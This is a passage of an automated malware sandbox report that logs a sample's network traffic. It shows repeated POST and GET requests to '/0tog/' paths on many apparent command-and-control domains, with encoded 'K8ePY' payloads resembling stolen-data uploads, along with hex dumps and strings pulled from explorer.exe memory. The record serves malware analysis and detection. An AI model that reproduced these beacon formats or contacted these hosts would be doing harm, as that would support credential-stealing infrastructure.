K8ePY=jxYhZn431rnpR-BI9V4DW5dQlNJe58l4mg~d3wMApIavr5aEyWL0jC0NIEVrnwVuye45nmf3CtbTEubhwYSF3zR7nxPi1RhT0iflHEJyQkF28wMlwSMt1AAw2tv7Br6qhPDpQ-E58R2Lt1~zT3efDBxeOCc0r_x0YG~Qj3rvyLH9U3fPn_YoeHzNw195P8QEleimwmIQjXFW0ZDDLMoxg84a(Wz9zfFkgLf-Ad7VtCm9j_rzL5omyIv6eG9UTPfXpMMY5YEVQvzJL9dPlWsO(tnT6Fc20QiO(Z4pjZhgbF7ZoUG2JxR9VoCti9KSBje8MgKFSMexB7BgOTqaHs0KN5KCeNAdFe1YUlj3MsV1sj08JKa-O-1Tet8oDKxIp-hoQM9u0EExMO(8VicujA).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.kuralike.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.kuralike.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kuralike.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 71 48 4e 53 63 6a 73 38 57 66 4a 50 66 68 5a 52 76 33 66 75 61 56 52 48 44 43 39 59 58 79 46 46 28 73 4d 45 6b 66 79 70 58 44 31 61 55 47 34 58 6e 6e 56 50 65 4a 28 73 42 31 75 76 49 33 37 4b 71 49 75 54 54 2d 54 32 7e 79 49 48 34 62 39 47 54 66 4c 49 5a 69 6d 4d 44 34 41 50 43 31 4a 4b 6f 38 69 76 61 33 48 59 59 4d 61 4d 4f 57 7a 38 4d 58 6a 34 33 54 50 49 72 43 7e 72 69 69 53 63 39 71 55 77 77 68 4c 52 59 34 74 32 67 37 44 49 34 4f 48 66 52 65 35 47 43 32 64 61 76 73 63 6e 61 5f 42 7a 75 6b 30 56 6b 6a 70 37 52 62 7e 69 37 2d 6e 55 38 69 33 73 34 4d 30 32 54 4c 6c 30 43 70 30 65 59 73 71 71 56 67 4d 70 63 44 4a 66 6c 4e 7a 51 31 7a 6b 34 6b 79 37 48 38 47 33 69 34 54 70 73 36 76 4a 30 64 43 66 56 69 74 7e 65 76 68 64 7a 64 52 73 43 31 53 67 70 68 6f 30 70 44 78 4c 55 43 44 4e 4f 39 37 59 6a 71 56 6e 46 4f 66 45 45 53 70 74 49 62 5a 37 56 39 69 38 78 58 77 58 70 4d 34 31 5a 72 49 35 6a 6e 54 79 71 38 6b 7a 5a 48 74 77 46 4e 66 39 5a 49 43 78 63 4b 63 71 6e 73 46 63 71 6a 41 57 2d 33 73 53 6c 72 4e 65 49 6f 35 54 58 70 55 37 57 79 70 28 35 4c 61 28 42 43 55 53 70 64 6d 6e 44 51 72 70 5f 7a 69 69 5a 44 73 64 75 46 39 6a 61 76 43 36 70 78 59 44 44 77 30 59 7a 5a 63 54 49 28 78 46 31 4e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
K8ePY=qHNScjs8WfJPfhZRv3fuaVRHDC9YXyFF(sMEkfypXD1aUG4XnnVPeJ(sB1uvI37KqIuTT-T2~yIH4b9GTfLIZimMD4APC1JKo8iva3HYYMaMOWz8MXj43TPIrC~riiSc9qUwwhLRY4t2g7DI4OHfRe5GC2davscna_Bzuk0Vkjp7Rb~i7-nU8i3s4M02TLl0Cp0eYsqqVgMpcDJflNzQ1zk4ky7H8G3i4Tps6vJ0dCfVit~evhdzdRsC1Sgpho0pDxLUCDNO97YjqVnFOfEESptIbZ7V9i8xXwXpM41ZrI5jnTyq8kzZHtwFNf9ZICxcKcqnsFcqjAW-3sSlrNeIo5TXpU7Wyp(5La(BCUSpdmnDQrp_ziiZDsduF9javC6pxYDDw0YzZcTI(xF1Nw).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cdershoushichang.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cdershoushichang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cdershoushichang.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 37 7a 75 38 35 2d 54 49 63 49 32 61 63 49 47 32 37 33 37 31 55 74 44 46 63 46 36 79 76 65 5a 5a 61 36 4f 5f 42 61 46 4b 43 30 4c 31 34 45 4e 4e 6d 55 50 72 6e 72 28 62 42 52 7a 71 52 50 38 49 7e 34 63 66 66 6e 54 33 52 55 65 71 69 4c 42 6d 58 46 39 55 44 41 50 4d 36 68 51 63 33 76 39 43 6f 6e 51 31 5a 66 4d 49 6b 6d 6a 64 36 77 30 42 56 58 78 79 4f 38 4b 5f 65 71 4d 55 28 42 44 73 67 78 75 6e 5a 33 36 55 50 37 69 39 76 45 70 66 46 76 6c 6d 6a 54 7a 48 6b 7a 70 46 39 6b 45 77 57 43 48 36 48 58 62 66 69 31 32 78 76 49 59 74 38 4a 78 52 44 54 75 37 54 78 69 45 48 55 6e 58 34 4d 32 43 79 4a 50 62 7e 72 62 37 39 30 39 35 74 4a 52 7a 34 31 64 46 4f 62 28 71 42 71 75 66 32 6d 53 49 34 51 79 72 79 65 31 47 28 35 33 6a 65 68 49 7a 35 63 47 44 36 37 6c 67 38 37 38 62 64 6a 55 4d 42 5f 35 36 69 74 66 35 37 35 47 66 67 64 57 69 6f 5f 7e 48 69 31 67 35 59 34 78 58 67 62 72 4f 54 35 33 6d 71 36 77 46 56 79 54 58 70 31 30 39 42 41 4c 7a 43 44 65 55 57 49 79 38 54 36 48 53 41 2d 48 4a 74 79 6a 79 35 45 51 6f 62 46 4c 67 31 4b 56 6e 78 41 63 72 32 51 39 51 4a 49 47 6c 76 57 78 4d 72 54 73 73 35 71 56 37 69 65 57 4b 34 4b 73 35 6d 78 4e 57 70 30 78 65 35 6c 77 41 56 58 74 6d 4c 73 6e 4d 48 6b 6a 5f 71 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
K8ePY=7zu85-TIcI2acIG27371UtDFcF6yveZZa6O_BaFKC0L14ENNmUPrnr(bBRzqRP8I~4cffnT3RUeqiLBmXF9UDAPM6hQc3v9ConQ1ZfMIkmjd6w0BVXxyO8K_eqMU(BDsgxunZ36UP7i9vEpfFvlmjTzHkzpF9kEwWCH6HXbfi12xvIYt8JxRDTu7TxiEHUnX4M2CyJPb~rb79095tJRz41dFOb(qBquf2mSI4Qyrye1G(53jehIz5cGD67lg878bdjUMB_56itf575GfgdWio_~Hi1g5Y4xXgbrOT53mq6wFVyTXp109BALzCDeUWIy8T6HSA-HJtyjy5EQobFLg1KVnxAcr2Q9QJIGlvWxMrTss5qV7ieWK4Ks5mxNWp0xe5lwAVXtmLsnMHkj_qw).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cakoi.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cakoi.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cakoi.xyz/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 4a 48 4a 55 79 77 32 39 35 36 6c 5a 70 67 4a 54 71 5a 6b 4f 54 5f 70 43 73 62 4f 75 7e 76 61 30 71 64 42 62 28 7a 55 44 47 36 6d 65 69 57 31 5f 38 5a 41 78 39 74 64 62 4e 34 6e 6b 6d 68 6d 4a 44 4b 58 37 66 50 37 78 70 68 52 69 41 57 52 36 65 56 74 32 33 37 42 67 69 34 76 66 54 37 7a 47 4c 74 6f 74 73 4e 54 52 7e 6d 4f 55 4e 63 73 4f 68 4c 78 53 35 59 36 70 28 74 4d 53 33 63 66 2d 4a 52 44 59 58 68 68 74 71 4a 54 48 4a 6d 48 6e 6b 6d 6a 4f 37 41 7e 69 75 64 71 79 67 6a 28 78 47 6d 7e 30 46 46 41 61 71 48 51 4b 74 4b 38 36 61 4d 55 75 62 33 56 37 44 44 64 62 43 61 44 55 79 41 63 6c 38 2d 58 6d 36 7a 53 46 68 79 62 44 50 41 48 6b 41 52 45 6a 78 59 4d 4d 55 61 61 32 6d 49 5a 67 4b 79 4e 78 65 6c 36 43 6f 66 42 31 4d 48 57 63 70 5a 30 4c 50 51 75 4d 39 51 52 78 43 57 32 52 50 75 43 62 33 62 7a 66 56 56 62 64 54 39 6b 32 7a 73 6a 59 54 7a 39 43 5a 41 46 62 41 6f 53 41 71 6a 5a 59 6c 66 52 50 45 6d 75 76 4f 4e 44 34 6d 7a 37 71 68 5f 4c 43 33 62 66 6a 7a 6b 75 50 59 74 6f 34 73 52 53 7a 79 5a 4c 42 63 32 49 33 77 36 57 2d 57 5f 4b 5f 6e 78 53 36 6a 30 6a 70 4a 44 4e 44 54 74 4d 39 57 34 42 7a 6d 6a 72 43 57 77 43 37 69 47 59 49 77 5a 49 34 54 42 50 5f 72 51 50 69 72 31 44 5a 64 75 6e 73 79 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
K8ePY=JHJUyw2956lZpgJTqZkOT_pCsbOu~va0qdBb(zUDG6meiW1_8ZAx9tdbN4nkmhmJDKX7fP7xphRiAWR6eVt237Bgi4vfT7zGLtotsNTR~mOUNcsOhLxS5Y6p(tMS3cf-JRDYXhhtqJTHJmHnkmjO7A~iudqygj(xGm~0FFAaqHQKtK86aMUub3V7DDdbCaDUyAcl8-Xm6zSFhybDPAHkAREjxYMMUaa2mIZgKyNxel6CofB1MHWcpZ0LPQuM9QRxCW2RPuCb3bzfVVbdT9k2zsjYTz9CZAFbAoSAqjZYlfRPEmuvOND4mz7qh_LC3bfjzkuPYto4sRSzyZLBc2I3w6W-W_K_nxS6j0jpJDNDTtM9W4BzmjrCWwC7iGYIwZI4TBP_rQPir1DZdunsyQ).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.davabeauty.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.davabeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.davabeauty.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 6f 64 6a 79 4d 6d 76 72 6f 6c 48 71 30 71 53 54 4a 63 75 37 58 39 62 38 6d 45 6c 72 72 73 58 48 48 44 69 35 76 50 61 33 33 38 6d 61 5a 4f 79 68 58 38 32 4f 6e 51 6e 5a 62 66 4b 71 59 38 4e 76 57 38 69 61 41 7a 79 70 33 5a 4f 44 76 57 47 47 66 5a 62 33 7e 58 47 41 52 64 69 59 56 76 39 36 58 4f 42 31 69 68 67 67 65 38 68 6a 35 4c 37 4d 32 6d 43 49 32 74 45 51 64 4b 4f 70 6e 7a 4f 34 69 44 79 49 4a 52 64 52 47 51 4a 5a 7a 6d 68 72 65 33 50 4a 46 53 46 41 6f 35 58 65 6d 50 62 4b 6a 32 36 5f 69 73 50 4c 6a 6a 63 6c 78 7a 6c 36 52 37 77 4f 4e 6a 79 31 47 78 50 67 76 62 69 77 44 50 61 47 41 4b 34 43 61 5f 47 55 37 75 42 41 41 36 7e 6e 41 76 69 48 6e 47 33 49 6b 33 4d 71 7a 77 62 6b 77 44 6d 39 37 54 33 39 34 50 28 47 48 70 52 42 78 70 56 71 71 73 73 34 55 4c 57 32 42 57 64 52 44 62 53 2d 76 7a 33 6d 63 6d 56 46 38 61 61 67 78 31 58 69 4a 54 42 5a 72 78 31 6e 75 7a 6b 5f 64 68 4f 4e 35 6b 6b 2d 51 46 57 76 73 2d 36 43 59 45 6b 58 71 47 54 66 64 4a 42 6e 67 63 70 6a 37 46 4e 5f 67 70 4e 67 5a 6b 61 49 4d 70 37 56 34 5a 72 48 30 4b 41 64 78 63 51 2d 42 58 41 77 6d 5a 51 6e 59 6e 75 35 5a 55 49 75 28 42 32 59 33 74 48 65 52 72 66 77 58 32 4b 61 32 31 28 76 6d 33 72 51 66 70 30 6d 72 34 61 6c 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
K8ePY=odjyMmvrolHq0qSTJcu7X9b8mElrrsXHHDi5vPa338maZOyhX82OnQnZbfKqY8NvW8iaAzyp3ZODvWGGfZb3~XGARdiYVv96XOB1ihgge8hj5L7M2mCI2tEQdKOpnzO4iDyIJRdRGQJZzmhre3PJFSFAo5XemPbKj26_isPLjjclxzl6R7wONjy1GxPgvbiwDPaGAK4Ca_GU7uBAA6~nAviHnG3Ik3MqzwbkwDm97T394P(GHpRBxpVqqss4ULW2BWdRDbS-vz3mcmVF8aagx1XiJTBZrx1nuzk_dhON5kk-QFWvs-6CYEkXqGTfdJBngcpj7FN_gpNgZkaIMp7V4ZrH0KAdxcQ-BXAwmZQnYnu5ZUIu(B2Y3tHeRrfwX2Ka21(vm3rQfp0mr4alDQ).
Source: global traffic HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.icfc-lr.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.icfc-lr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.icfc-lr.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 74 77 7e 38 57 64 4b 48 5a 4c 38 45 73 31 6e 34 6a 74 6a 4a 38 35 4c 35 70 72 37 63 7e 50 38 59 7a 35 65 54 72 41 70 72 62 59 6c 48 68 61 50 39 4c 56 42 51 30 4b 78 75 74 59 79 54 4d 2d 42 35 4c 7a 63 75 68 34 62 31 69 31 45 64 4d 6f 70 6e 69 2d 68 59 65 36 57 76 6d 72 5a 70 71 38 45 56 42 42 53 6f 6f 41 51 64 7e 53 6a 43 4d 47 63 52 57 50 52 53 6f 48 63 49 4d 2d 39 76 54 31 41 58 4e 45 43 7a 47 5f 33 4f 6d 36 4b 5f 45 36 74 6e 42 66 31 6e 67 76 61 75 69 63 6d 46 7a 72 72 65 41 70 78 31 69 74 6a 63 78 44 31 74 7e 6f 58 66 65 61 6d 4b 6f 5f 4c 4b 64 55 45 5a 6d 43 73 6f 79 57 45 34 66 4e 46 5f 63 68 28 35 59 44 48 61 50 58 4c 75 32 7a 68 38 76 37 63 34 59 2d 61 64 45 58 4b 6f 57 67 45 56 4d 33 4f 4c 6b 69 67 42 79 4d 5a 52 53 52 6f 74 6b 42 34 55 6d 41 43 64 51 2d 55 61 73 77 69 34 7a 62 36 6d 77 44 46 38 6e 54 6b 70 77 37 71 43 56 79 48 51 39 63 52 30 28 50 41 31 6e 79 6b 76 64 53 6a 5f 41 45 69 79 79 74 52 64 4b 59 41 65 44 46 48 4b 54 66 51 6d 4d 53 42 5f 62 55 72 76 76 50 43 33 79 35 46 74 41 6d 57 76 36 5f 54 78 37 7a 65 70 76 6c 68 61 61 30 4a 4e 6f 30 36 2d 79 62 31 68 50 48 75 43 48 49 79 56 73 77 65 62 32 5a 4d 48 79 77 78 73 67 64 34 63 33 6a 37 31 41 61 62 5a 45 49 5a 54 75 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=tw~8WdKHZL8Es1n4jtjJ85L5pr7c~P8Yz5eTrAprbYlHhaP9LVBQ0KxutYyTM-B5Lzcuh4b1i1EdMopni-hYe6WvmrZpq8EVBBSooAQd~SjCMGcRWPRSoHcIM-9vT1AXNECzG_3Om6K_E6tnBf1ngvauicmFzrreApx1itjcxD1t~oXfeamKo_LKdUEZmCsoyWE4fNF_ch(5YDHaPXLu2zh8v7c4Y-adEXKoWgEVM3OLkigByMZRSRotkB4UmACdQ-Uaswi4zb6mwDF8nTkpw7qCVyHQ9cR0(PA1nykvdSj_AEiyytRdKYAeDFHKTfQmMSB_bUrvvPC3y5FtAmWv6_Tx7zepvlhaa0JNo06-yb1hPHuCHIyVsweb2ZMHywxsgd4c3j71AabZEIZTuA).
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG HTTP/1.1Host: www.smileyefero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG HTTP/1.1Host: www.cxyl968.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG HTTP/1.1Host: www.bestselfietools.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG HTTP/1.1Host: www.homecaredispatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG HTTP/1.1Host: www.netrworksoultions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG HTTP/1.1Host: www.splishysplashie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG HTTP/1.1Host: www.ugpounds.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG HTTP/1.1Host: www.kuralike.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG HTTP/1.1Host: www.cdershoushichang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG HTTP/1.1Host: www.cakoi.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG HTTP/1.1Host: www.davabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG HTTP/1.1Host: www.icfc-lr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.smileyefero.com
Source: unknown HTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cxyl968.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cxyl968.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cxyl968.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 57 76 45 39 32 66 32 71 67 71 39 72 68 4c 6e 65 64 6e 62 65 4b 4e 4b 39 31 57 39 77 61 43 71 77 41 65 30 47 6a 6f 78 44 61 53 54 38 72 30 78 36 73 77 6e 67 52 2d 30 4d 31 4c 30 41 39 71 6b 57 44 44 77 56 55 72 62 79 47 6c 7a 48 72 4a 41 49 47 66 76 31 79 4b 5a 46 6e 74 39 32 72 6e 52 6c 77 30 28 56 4a 5f 36 6d 76 5f 6c 70 48 71 39 32 79 61 68 6b 66 6b 54 47 4f 57 5a 77 49 4d 69 50 38 51 4c 41 6e 57 52 66 6c 64 72 66 6c 38 31 6f 76 76 52 6f 69 76 64 6c 45 45 53 43 28 49 4c 4b 75 39 64 4f 6f 70 48 49 6b 47 38 79 58 32 48 36 35 5f 34 32 4f 73 76 74 67 78 52 31 62 6d 51 51 48 47 67 49 7e 58 47 30 45 57 44 41 73 55 28 66 46 6a 30 68 72 6a 62 56 39 79 4f 4c 4a 42 67 46 33 66 62 68 75 74 66 5a 61 42 6f 47 32 73 7a 45 42 68 59 4f 67 51 7a 6d 69 34 63 41 76 53 4b 63 50 30 6f 5a 74 56 5a 6f 46 6e 33 75 32 50 70 53 73 68 49 66 53 56 46 37 68 6d 76 6b 49 79 4b 41 79 68 34 4b 69 7a 43 69 39 77 42 43 4a 4a 32 5a 77 63 54 42 69 57 64 37 36 71 53 72 71 4e 50 49 58 71 4a 67 4a 49 34 4f 42 44 45 47 5a 34 65 4a 44 50 77 57 4f 55 74 69 4c 77 48 5a 4d 53 71 48 72 6d 63 43 55 49 4b 65 70 49 4d 63 7e 63 6f 56 56 4f 55 72 67 37 68 6a 4d 55 39 53 47 53 54 36 57 67 78 73 38 4f 32 73 36 61 47 45 49 5a 49 66 6e 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=WvE92f2qgq9rhLnednbeKNK91W9waCqwAe0GjoxDaST8r0x6swngR-0M1L0A9qkWDDwVUrbyGlzHrJAIGfv1yKZFnt92rnRlw0(VJ_6mv_lpHq92yahkfkTGOWZwIMiP8QLAnWRfldrfl81ovvRoivdlEESC(ILKu9dOopHIkG8yX2H65_42OsvtgxR1bmQQHGgI~XG0EWDAsU(fFj0hrjbV9yOLJBgF3fbhutfZaBoG2szEBhYOgQzmi4cAvSKcP0oZtVZoFn3u2PpSshIfSVF7hmvkIyKAyh4KizCi9wBCJJ2ZwcTBiWd76qSrqNPIXqJgJI4OBDEGZ4eJDPwWOUtiLwHZMSqHrmcCUIKepIMc~coVVOUrg7hjMU9SGST6Wgxs8O2s6aGEIZIfnA).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Frame-Options: SAMEORIGINDate: Wed, 16 Sep 2020 07:14:45 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
